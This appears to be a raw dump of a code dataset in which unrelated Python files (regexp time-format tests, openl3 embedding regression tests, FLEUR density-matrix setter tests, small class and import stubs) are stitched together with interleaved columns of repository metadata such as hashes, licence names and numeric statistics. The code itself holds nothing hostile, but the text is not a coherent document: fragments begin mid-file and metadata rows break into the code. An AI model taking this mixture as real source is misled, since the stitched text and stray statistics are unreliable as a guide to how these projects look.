self.assertTrue(re.match(regexp, "40"))
regexp = regexpgen.time("%H:%M", "01:22", "12:13")
self.assertFalse(re.match(regexp, "12:56"))
self.assertFalse(re.match(regexp, "13:40"))
self.assertFalse(re.match(regexp, "01:21"))
self.assertTrue(re.match(regexp, "01:22"))
self.assertTrue(re.match(regexp, "10:01"))
self.assertTrue(re.match(regexp, "12:13"))
regexp = regexpgen.time("%I:%M %P", "12:13 PM", "05:13 PM")
self.assertFalse(re.match(regexp, "12:12 PM"))
self.assertFalse(re.match(regexp, "05:14 PM"))
self.assertFalse(re.match(regexp, "06:59 PM"))
self.assertFalse(re.match(regexp, "02:12 AM"))
self.assertTrue(re.match(regexp, "05:13 PM"))
self.assertTrue(re.match(regexp, "05:12 PM"))
self.assertTrue(re.match(regexp, "02:12 PM"))
regexp = regexpgen.time("%I:%M %P", "03:00 AM", "05:13 AM")
self.assertFalse(re.match(regexp, "12:12 PM"))
self.assertFalse(re.match(regexp, "05:14 AM"))
self.assertFalse(re.match(regexp, "06:59 AM"))
self.assertFalse(re.match(regexp, "02:14 AM"))
self.assertTrue(re.match(regexp, "05:13 AM"))
self.assertTrue(re.match(regexp, "05:00 AM"))
self.assertTrue(re.match(regexp, "04:12 AM"))
self.assertTrue(re.match(regexp, "03:12 AM"))
regexp = regexpgen.time("%I:%M %P", "03:00 AM", "05:13 PM")
self.assertFalse(re.match(regexp, "02:12 AM"))
self.assertFalse(re.match(regexp, "05:14 PM"))
self.assertFalse(re.match(regexp, "06:59 PM"))
self.assertFalse(re.match(regexp, "02:59 AM"))
self.assertTrue(re.match(regexp, "05:13 AM"))
self.assertTrue(re.match(regexp, "05:00 PM"))
self.assertTrue(re.match(regexp, "04:12 AM"))
self.assertTrue(re.match(regexp, "03:12 AM"))
self.assertTrue(re.match(regexp, "12:12 PM"))
def testForDifferentSeparator(self):
regexp = regexpgen.time("%H::%M")
self.assertTrue(re.match(regexp, "01::00"))
self.assertTrue(re.match(regexp, "00::00"))
self.assertTrue(re.match(regexp, "00::05"))
self.assertTrue(re.match(regexp, "23::59"))
self.assertTrue(re.match(regexp, "17::34"))
self.assertFalse(re.match(regexp, "01-00"))
self.assertFalse(re.match(regexp, "00-00"))
self.assertFalse(re.match(regexp, "00-05"))
self.assertFalse(re.match(regexp, "23:59"))
self.assertFalse(re.match(regexp, "17\34"))
regexp = regexpgen.time("%H %M")
self.assertTrue(re.match(regexp, "01 00"))
self.assertTrue(re.match(regexp, "00 00"))
self.assertTrue(re.match(regexp, "00 05"))
self.assertTrue(re.match(regexp, "23 59"))
self.assertTrue(re.match(regexp, "17 34"))
self.assertFalse(re.match(regexp, "01-00"))
self.assertFalse(re.match(regexp, "00-00"))
self.assertFalse(re.match(regexp, "00-05"))
self.assertFalse(re.match(regexp, "23:59"))
self.assertFalse(re.match(regexp, "17\34"))
regexp = regexpgen.time("%H-%M")
self.assertTrue(re.match(regexp, "01-00"))
self.assertTrue(re.match(regexp, "00-00"))
self.assertTrue(re.match(regexp, "00-05"))
self.assertTrue(re.match(regexp, "23-59"))
self.assertTrue(re.match(regexp, "17-34"))
self.assertFalse(re.match(regexp, "01--00"))
self.assertFalse(re.match(regexp, "00--00"))
self.assertFalse(re.match(regexp, "00::05"))
self.assertFalse(re.match(regexp, "23:59"))
self.assertFalse(re.match(regexp, "17\34"))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 34.003425
| 82
| 0.6761
| 1,496
| 9,929
| 4.481952
| 0.058155
| 0.173304
| 0.321849
| 0.269351
| 0.93393
| 0.904847
| 0.781506
| 0.699776
| 0.633408
| 0.539597
| 0
| 0.07688
| 0.109175
| 9,929
| 291
| 83
| 34.120275
| 0.681176
| 0.01128
| 0
| 0.353488
| 0
| 0
| 0.122948
| 0
| 0
| 0
| 0
| 0
| 0.827907
| 1
| 0.032558
| false
| 0
| 0.018605
| 0
| 0.055814
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad2ab0b2fa7941e2b054610b02f8b81b315ac4f4
| 138
|
py
|
Python
|
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | 1
|
2018-02-04T14:48:15.000Z
|
2018-02-04T14:48:15.000Z
|
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | null | null | null |
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | null | null | null |
from BinOp import BinOp
class Lte(BinOp):
def __init__(self):
pass
def __str__(self):
return 'LESS THAN EQUAL'
| 13.8
| 32
| 0.615942
| 18
| 138
| 4.277778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 138
| 9
| 33
| 15.333333
| 0.802083
| 0
| 0
| 0
| 0
| 0
| 0.108696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
ad419ae7ec077fff6adab4e62c6c7d47fafd9483
| 42
|
py
|
Python
|
toggl/cli/__init__.py
|
Bass-03/toggl-cli
|
ba1bb0409bdd85dab5cf10fba9fc37b6b533eb38
|
[
"MIT"
] | 178
|
2018-12-03T08:45:43.000Z
|
2022-03-24T21:44:49.000Z
|
toggl/cli/__init__.py
|
Bass-03/toggl-cli
|
ba1bb0409bdd85dab5cf10fba9fc37b6b533eb38
|
[
"MIT"
] | 123
|
2018-02-04T10:03:49.000Z
|
2022-03-30T18:30:31.000Z
|
toggl/cli/__init__.py
|
beauraines/toggl-cli
|
d79af4f48518725a80db1fddf3e5c180aecfdf20
|
[
"MIT"
] | 44
|
2015-02-12T20:30:39.000Z
|
2018-10-29T22:53:12.000Z
|
from toggl.cli.commands import entrypoint
| 21
| 41
| 0.857143
| 6
| 42
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ad873fc55388ec62f6541bad616a8557df7a9e20
| 248
|
py
|
Python
|
mrcnn/utils/exceptions.py
|
darolt/mask_rcnn
|
680e960ddc70ec912c4d7084b7b15c9e3e6632a7
|
[
"MIT"
] | 40
|
2018-09-04T15:06:50.000Z
|
2021-07-17T13:51:26.000Z
|
mrcnn/utils/exceptions.py
|
conanhung/mask_rcnn-1
|
fd594b726a33432d7d8d326bddf35d0093ad90fa
|
[
"MIT"
] | 6
|
2019-06-06T14:38:48.000Z
|
2021-07-29T14:46:47.000Z
|
mrcnn/utils/exceptions.py
|
conanhung/mask_rcnn-1
|
fd594b726a33432d7d8d326bddf35d0093ad90fa
|
[
"MIT"
] | 9
|
2019-04-03T15:55:15.000Z
|
2020-05-20T10:24:33.000Z
|
class NoBoxHasPositiveArea(Exception):
def __init__(self):
Exception.__init__(self, 'No box has positive area.')
class NoBoxToKeep(Exception):
def __init__(self):
Exception.__init__(self, 'No box to keep in detection.')
| 22.545455
| 64
| 0.697581
| 29
| 248
| 5.413793
| 0.551724
| 0.203822
| 0.203822
| 0.254777
| 0.535032
| 0.535032
| 0.535032
| 0.535032
| 0.535032
| 0
| 0
| 0
| 0.197581
| 248
| 10
| 65
| 24.8
| 0.788945
| 0
| 0
| 0.333333
| 0
| 0
| 0.215447
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
d1111e71a19bca539ae9f59d14121903ebc7fa6c
| 224
|
py
|
Python
|
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
from polyaxon_client.settings import POLYAXON_NO_OP_KEY, TMP_POLYAXON_PATH # noqa
from polyaxon_client.tracking import BuildJob, Experiment, Job # noqa
from polyaxon_client.tracking.utils.hashing import hash_value # noqa
| 56
| 82
| 0.84375
| 32
| 224
| 5.625
| 0.59375
| 0.2
| 0.3
| 0.244444
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 224
| 3
| 83
| 74.666667
| 0.9
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d1398e75e4b0388cf9a590de67255c23f699ac06
| 65
|
py
|
Python
|
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | 3
|
2020-02-11T23:45:43.000Z
|
2021-09-03T15:18:06.000Z
|
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | null | null | null |
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | 3
|
2022-02-23T21:41:26.000Z
|
2022-02-26T20:53:27.000Z
|
from .cil import *
from .mips import *
from .type_check import *
| 16.25
| 25
| 0.723077
| 10
| 65
| 4.6
| 0.6
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184615
| 65
| 3
| 26
| 21.666667
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d164b60288eb7dcff28d06e2896004a7f1a54e67
| 69
|
py
|
Python
|
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
import pytest
print("Why aren't there any unit tests yet dummy :P")
| 17.25
| 53
| 0.73913
| 13
| 69
| 3.923077
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 54
| 23
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0.637681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
d16d1c35579d1f76aaada2ece3a6febfd2cd0de7
| 8,318
|
py
|
Python
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 279
|
2018-11-14T21:37:16.000Z
|
2022-03-25T09:18:32.000Z
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 76
|
2018-10-31T18:13:11.000Z
|
2022-02-09T22:44:41.000Z
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 45
|
2018-11-14T21:44:21.000Z
|
2022-03-29T09:38:30.000Z
|
import os
from openl3.cli import run
import tempfile
import numpy as np
import shutil
import pytest
TEST_DIR = os.path.dirname(__file__)
TEST_AUDIO_DIR = os.path.join(TEST_DIR, 'data', 'audio')
TEST_IMAGE_DIR = os.path.join(TEST_DIR, 'data', 'image')
TEST_VIDEO_DIR = os.path.join(TEST_DIR, 'data', 'video')
# Test audio file paths
CHIRP_MONO_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_mono.wav')
CHIRP_STEREO_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_stereo.wav')
CHIRP_44K_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_44k.wav')
CHIRP_1S_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_1s.wav')
EMPTY_PATH = os.path.join(TEST_AUDIO_DIR, 'empty.wav')
SHORT_PATH = os.path.join(TEST_AUDIO_DIR, 'short.wav')
SILENCE_PATH = os.path.join(TEST_AUDIO_DIR, 'silence.wav')
# Test image file paths
DAISY_PATH = os.path.join(TEST_IMAGE_DIR, 'daisy.jpg')
BLANK_PATH = os.path.join(TEST_IMAGE_DIR, 'blank.png')
SMALL_PATH = os.path.join(TEST_IMAGE_DIR, 'smol.png')
# Test video file paths
BENTO_PATH = os.path.join(TEST_VIDEO_DIR, 'bento.mp4')
# Regression file paths
TEST_REG_DIR = os.path.join(TEST_DIR, 'data', 'regression')
REG_CHIRP_44K_PATH = os.path.join(TEST_REG_DIR, 'chirp_44k_{}.npz')
REG_CHIRP_44K_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'chirp_44k_{}_linear.npz')
REG_DAISY_PATH = os.path.join(TEST_REG_DIR, 'daisy.npz')
REG_DAISY_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'daisy_linear.npz')
REG_BENTO_AUDIO_PATH = os.path.join(TEST_REG_DIR, 'bento_audio_{}.npz')
REG_BENTO_AUDIO_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'bento_audio_{}_linear.npz')
REG_BENTO_IMAGE_PATH = os.path.join(TEST_REG_DIR, 'bento_image_{}.npz')
REG_BENTO_IMAGE_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'bento_image_{}_linear.npz')
@pytest.mark.parametrize("frontend", ['kapre', 'librosa'])
def test_audio_regression(capsys, frontend):
# test correct execution on test audio file (regression)
tempdir = tempfile.mkdtemp()
run('audio', CHIRP_44K_PATH, output_dir=tempdir, audio_frontend=frontend, verbose=True)
# check output file created
audio_outfile = os.path.join(tempdir, 'chirp_44k.npz')
assert os.path.isfile(audio_outfile)
# regression test
audio_data_reg = np.load(REG_CHIRP_44K_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('audio', CHIRP_44K_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', audio_embedding_size=512, audio_center=False, audio_hop_size=0.5,
audio_frontend=frontend, verbose=False)
# check output file created
audio_outfile = os.path.join(tempdir, 'chirp_44k_linear.npz')
assert os.path.isfile(audio_outfile)
# regression test
audio_data_reg = np.load(REG_CHIRP_44K_LINEAR_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# delete output file and temp folder
shutil.rmtree(tempdir)
def test_image_regression(capsys):
# test correct execution on test image file (regression)
tempdir = tempfile.mkdtemp()
run('image', DAISY_PATH, output_dir=tempdir, verbose=True)
# check output file created
image_outfile = os.path.join(tempdir, 'daisy.npz')
assert os.path.isfile(image_outfile)
# regression test
image_data_reg = np.load(REG_DAISY_PATH)
image_data_out = np.load(image_outfile)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == ['embedding']
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('image', DAISY_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', image_embedding_size=512, verbose=False)
# check output file created
image_outfile = os.path.join(tempdir, 'daisy_linear.npz')
assert os.path.isfile(image_outfile)
# regression test
image_data_reg = np.load(REG_DAISY_LINEAR_PATH)
image_data_out = np.load(image_outfile)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == ['embedding']
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# delete output file and temp folder
shutil.rmtree(tempdir)
@pytest.mark.parametrize("frontend", ['kapre', 'librosa'])
def test_video_regression(capsys, frontend):
tempdir = tempfile.mkdtemp()
## Video processing regression tests
run('video', BENTO_PATH, output_dir=tempdir, audio_frontend=frontend, verbose=True)
# check output files created
audio_outfile = os.path.join(tempdir, 'bento_audio.npz')
assert os.path.isfile(audio_outfile)
image_outfile = os.path.join(tempdir, 'bento_image.npz')
assert os.path.isfile(image_outfile)
# regression test
audio_data_reg = np.load(REG_BENTO_AUDIO_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
image_data_reg = np.load(REG_BENTO_IMAGE_PATH.format(frontend))
image_data_out = np.load(image_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(image_data_out['timestamps'], image_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('video', BENTO_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', audio_embedding_size=512, image_embedding_size=512,
audio_center=False, audio_hop_size=0.5, audio_frontend=frontend, verbose=False)
# check output files created
audio_outfile = os.path.join(tempdir, 'bento_audio_linear.npz')
assert os.path.isfile(audio_outfile)
image_outfile = os.path.join(tempdir, 'bento_image_linear.npz')
assert os.path.isfile(image_outfile)
# regression test
audio_data_reg = np.load(REG_BENTO_AUDIO_LINEAR_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
image_data_reg = np.load(REG_BENTO_IMAGE_LINEAR_PATH.format(frontend))
image_data_out = np.load(image_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(image_data_out['timestamps'], image_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
| 45.955801
| 93
| 0.715436
| 1,201
| 8,318
| 4.660283
| 0.082431
| 0.04288
| 0.055387
| 0.057531
| 0.882437
| 0.862248
| 0.843488
| 0.783813
| 0.724674
| 0.686797
| 0
| 0.018296
| 0.158932
| 8,318
| 180
| 94
| 46.211111
| 0.781732
| 0.075018
| 0
| 0.52
| 0
| 0
| 0.124299
| 0.01526
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.024
| false
| 0
| 0.048
| 0
| 0.072
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
66fe92a1d1f5e359cd6e6ef323efaed12bd191de
| 110
|
py
|
Python
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from main import *
from lib import B
from lib import A, C
from other import C1, C2
print(C1, C2, C3, A, B, C)
| 18.333333
| 26
| 0.690909
| 24
| 110
| 3.166667
| 0.5
| 0.184211
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05814
| 0.218182
| 110
| 6
| 26
| 18.333333
| 0.825581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f15154cc15cc8f212ad06b92d9640fd698903b0
| 28
|
py
|
Python
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 59
|
2015-02-27T21:45:37.000Z
|
2021-03-16T04:37:40.000Z
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 14
|
2015-03-02T18:53:51.000Z
|
2016-07-19T23:20:23.000Z
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 8
|
2015-03-02T02:32:09.000Z
|
2017-07-31T21:14:51.000Z
|
from pbPlist import PBPlist
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f5eea7ca771ac8bab3f2ab4c78f714832a33174
| 6,889
|
py
|
Python
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 15
|
2018-11-07T10:04:46.000Z
|
2021-11-08T20:51:08.000Z
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 120
|
2020-02-04T15:37:42.000Z
|
2022-03-17T10:49:40.000Z
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 11
|
2018-10-18T08:09:07.000Z
|
2022-02-22T15:45:21.000Z
|
# -*- coding: utf-8 -*-
"""Contains tests for the set_nmmpmat routine used for modifying the
density matrix for LDA+U calculations."""
import os
import pytest
import numpy as np
TEST_INPXML_LDAU_PATH = 'fleur/Max-R5/GaAsMultiUForceXML/files/inp.xml'
TEST_NMMPMAT_PATH = 'fleur/input_nmmpmat.txt'
def test_set_nmmpmat_nofile(load_inpxml, file_regression):
"""Test setting of nmmpmat with no initial nmmpmat file given"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_set_nmmpmat_file(load_inpxml, file_regression, test_file):
"""Test setting of nmmpmat with initial nmmpmat file given"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
with open(test_file(TEST_NMMPMAT_PATH), mode='r', encoding='utf-8') as nmmpfile:
nmmp_lines = nmmpfile.read().split('\n')
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_set_nmmpmat_file_get_wigner_matrix(load_inpxml, file_regression):
"""Test get_wigner_matrix by calling set_nmmpmat_file with theta, or phi != None"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=1,
spin=1,
state_occupations=[1, 0, 1],
theta=np.pi / 2.0)
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, 0, 1], [0, 0, 0], [1, 0, 1]],
phi=np.pi / 4.0,
theta=np.pi / 2.0)
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_rotate_nmmpmat(load_inpxml, file_regression):
"""Test get_wigner_matrix by calling set_nmmpmat_file with theta, or phi != None"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat, rotate_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=1,
spin=1,
state_occupations=[1, 0, 1])
